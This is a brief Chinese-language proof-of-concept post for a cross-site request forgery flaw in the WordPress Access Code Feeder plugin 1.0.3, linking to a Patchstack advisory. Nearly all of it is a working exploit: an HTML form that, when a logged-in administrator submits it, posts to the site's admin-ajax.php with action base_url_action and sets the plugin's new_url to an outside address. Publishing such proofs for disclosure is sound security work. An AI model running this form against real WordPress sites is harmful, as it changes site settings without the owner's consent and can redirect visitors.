POC如下:
< html>
< body>
< form action="http://localhost/new/wp-admin/admin-ajax.php?action=base_url_action" method="POST" enctype="multipart/form-data">
< input type="hidden" name="new_url" value="http://www.google.com">
< input type="submit" name="Submit">
< /form>
< /body>
< /html>
漏洞详情:https://patchstack.com/database/vulnerability/access-code-feeder/wordpress-access-code-feeder-plugin-1-0-3-cross-site-request-forgery-csrf-vulnerability